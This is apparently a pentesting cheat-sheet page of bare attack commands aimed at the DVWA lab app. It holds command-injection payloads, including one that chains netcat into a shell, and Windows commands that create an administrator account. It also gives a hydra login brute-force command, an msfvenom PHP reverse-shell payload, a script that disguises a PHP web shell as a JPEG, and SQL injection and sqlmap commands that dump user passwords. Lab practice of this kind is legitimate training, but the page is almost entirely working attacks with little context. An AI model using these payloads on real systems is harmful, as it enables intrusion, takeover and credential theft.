Hacking Web Applications and Web Servers
Command Execution
Linux
127.0.0.1 && ls
127.0.0.1 & ls
127.0.0.1 & ls
127.0.0.1 ; ls
127.0.0.1 | ls
- with space127.0.0.1 |ls
- without space127.0.0.1 && nc -c sh 127.0.0.1 9001
Windows
hostname
whoami
tasklist
taskkill /PID 3112 /F
- forcefully kills the processesdir c:\\
net user
net user test /add
- add a new usernet localgroup Administrators test /add
- add test user to administratorsnet user test
- details of the userdir c:\\”pin.txt”
type c:\\”pin.txt”
Brute-Forcing
hydra -l admin -P /usr/share/wordlists/john.lst 'http-get-form://127.0.0.1:42001/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie\:PHPSESSID=7vs4mhc1q4dnp3f6cgikl01v9q; security=low:F=Username and/or password incorrect’
File Upload
msfvenom -p php/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw > exploit.php
exploit.php.img
GIf89a;
- add this line to any file to make it as image fileuse multi/handler
# PHP reverse shell of type image/jpeg
fh = open('shell.php', 'wb')
fh.write(b'\\xFF\\xD8\\xFF\\xE0' + b'<? passthru($_GET["cmd"]); ?>')
fh.close()
SQL Injection
Manual
1’ UNION SELECT user, password FROM users#
Sqlmap
sqlmap -r req.txt --batch
sqlmap -r req.txt --batch --level=5 --risk=3
sqlmap -r req.txt --batch --level=5 --risk=3 --current-db
sqlmap -r req.txt -D dvwa --tables
sqlmap -r req.txt -D dvwa -T users --columns
sqlmap -r req.txt -D dvwa -T users --dump
Last updated
Was this helpful?